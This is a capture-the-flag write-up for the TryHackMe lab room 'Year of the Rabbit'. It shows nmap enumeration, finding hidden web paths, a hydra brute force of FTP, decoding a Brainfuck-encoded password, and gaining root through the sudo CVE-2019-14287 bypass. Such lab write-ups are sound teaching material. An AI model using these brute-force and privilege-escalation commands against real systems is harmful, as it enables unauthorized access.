WriteUp — THM Year of the Rabbit
Can you hack into the Year of the Rabbit box without falling down a hole (Please ensure your volume is turned up!)
This is a writeup for TryHackMe room Year of the Rabbit.
Reconnaissance
Start with web server enumeration.
nmap -sC -sV -p- 10.10.138.222
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 17:59 EET
Nmap scan report for 10.10.138.222
Host is up (0.054s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelLooking at the default page there is just apache default page so enumerate web server further with gobuster. While I wait for gobuster it’s time to get Rickrolled by looking at /assets. But I also discover something hidden in style.css:
/* Nice to see someone checking the stylesheets.
Take a look at the page: /sup3r_s3cr3t_fl4g.php
*/And by navigating to that page I get Rickrolled again. There is nothing in the HTML except a Youtube link to the same video. After enumerating for hours with gobuster, nikto etc I finally focus more on the /sup3r_s3cr3t_fl4g.php. Maybe I can add some parameters to it or something? Taking a look at the HTTP response I notice that it’s actually a redirect!
HTTP/1.1 302 Found
Date: Sun, 08 Nov 2020 08:24:03 GMT
Server: Apache/2.4.10 (Debian)
Location: intermediary.php?hidden_directory=/WExYY2Cv-qU
Content-Length: 0
Content-Type: text/html; charset=UTF-8Going to that directory again gets me Rickrolled. Maybe I really need to turn Javascript off. So install NoScript and try again. This time it’s different:
Hot Babe is the classic Lenna test image. There must be somehing hidden inside so let’s take a look with classic tools.
Exiftool and binwalk return nothing, but strings gets me this:
Eh, you’ve earned this. Username for FTP is ftpuser
One of these is the password:
Mou****%QK8sr
1618****hw1M
A56****1s02u
vTFb***&Nmu?
...I copy the strings to a file and fire up hydra:
hydra -l ftpuser -P passwords 10.10.32.7 ftpIn a couple of seconds I get the right password and proceed to login to ftp server. There is a single file on the server with some brainfuck. Luckily a day ago I did another writeup for a room with brainfuck so I know where to look!
cat Eli\'s_Creds.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <Decoding this message I get eli’s password so time to login with SSH. There is a message to greet me at login:
ssh eli@10.10.32.7
eli@10.10.32.7's password:1 new message
Message from Root to Gwendoline:"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"END MESSAGE
/home/gwendoline has the user flag, but it’s not readable. Let’s try to find the hiding place:
find / -iname "*s3cr3t*" 2>/dev/null
/var/www/html/sup3r_s3cr3t_fl4g.php
/usr/games/s3cr3tThere is a hidden file in that directory:
cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just __REDACTED__
Honestly!Yours sincerely
-Root
We can log as gwendoline with this password and grab the user flag.
Privesc
The first thing to do if you know the password is check sudo:
sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
By taking a look at vi entry at GTFOBins it’s really easy to get root access and grab the flag. But since there is the !root entry in sudo it probably means that this system has CVE-2019–14287 vulnerability and we need to execute the command as:
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txtBOOM! We are root and can grab the flag.